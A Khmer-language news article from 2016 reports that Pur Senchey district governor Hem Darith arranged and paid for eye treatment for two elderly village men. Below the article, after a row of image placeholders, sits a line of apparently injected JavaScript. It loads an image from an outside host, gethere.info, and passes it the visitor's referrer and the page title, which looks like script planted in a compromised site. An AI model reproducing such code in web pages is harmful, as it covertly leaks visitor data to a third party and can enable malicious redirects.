ព្រឹតិ្តការណ៍ថ្មីៗ

លោកតា២នាក់ទទួលបានការយកចិត្តទុកដាក់ពីសំណាក់លោក ហែម ដារិទ្ធិ អភិបាលខណ្ឌពោធិ៍សែនជ័យ

2 ឆ្នាំ មុន 9 តូ សុផល

ភ្នំពេញ៖ កាលពីព្រឹកថ្ងៃ២២ ខែ ឧសភា ឆ្នាំ ២០១៦ លោក ហែម ដារិទ្ធិ អភិបាលនៃគណៈអភិបាលខណ្ឌពោធិ៍ សែនជ័យបានអញ្ជើញលោកតាដែលមានវ័យចំណាស់ពីរនាក់មកពិសារអាហារពេលព្រឹកជាមួយគាត់អោយ មានកម្លាំងពលំ មុនពេលអោយក្រុមការរបស់លោកជូនពួកគាត់ទាំងពីរទៅពិនិត្យភ្នែក តាមរយៈសមាគម គ្រូពេទ្យស្ម័គ្រចិត្តយុវជន សម្តេច តេជោ សហការណ៍ជាមួយមន្ទីរពេទ្យព្រះអង្គដួង នឹងមន្ទីរពេទ្យ Elizabeth (ក្រុមគ្រូពេទ្យឯកទេសភ្នែក មកពី ប្រទេសសឹង្ហបុរី)។
លោកតាទី១ មានឈ្មោះ ស្វាយ អុន អាយុ ៨៦ និង ឈ្មោះ អ៊ុត ផៃ អាយុ ៧៦ឆ្នាំ មេភូមិភូមិព្រៃរឹង សង្កាត់ស្នោរ ខណ្ឌពោធិ៍សែនជ័យ។
ប្រភពពីលោកហែម ដារិទ្ធិបានអោយដឹងថា ក្រោយទទួលបានព័ត៌មានថាមានលោកតាពីរនាក់មានបញ្ហាភ្នែក និងចំពេលដែលក្រុមគ្រូពេទ្យជំនាញផ្នែកចក្ខុ មកពីប្រទេសសឹង្ហបុរី សហការជាមួយមន្ទីពេទ្យព្រះអង្គដួង លោក បាន អោយមន្ត្រីក្រោមឱវាទ ទៅអញ្ជើញលោកតាទាំងពីរនាក់មកទទួលការព្យាបាល។ លោកបន្ថែមទៀតថា រាល់ការចំណាយ ការធ្វើដំណើរ ហូបចុក គឺលោកជាអ្នករ៉ាប់រងទាំងអស់។

image image image image image image image image image image image image image images.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ

error: Content is protected !!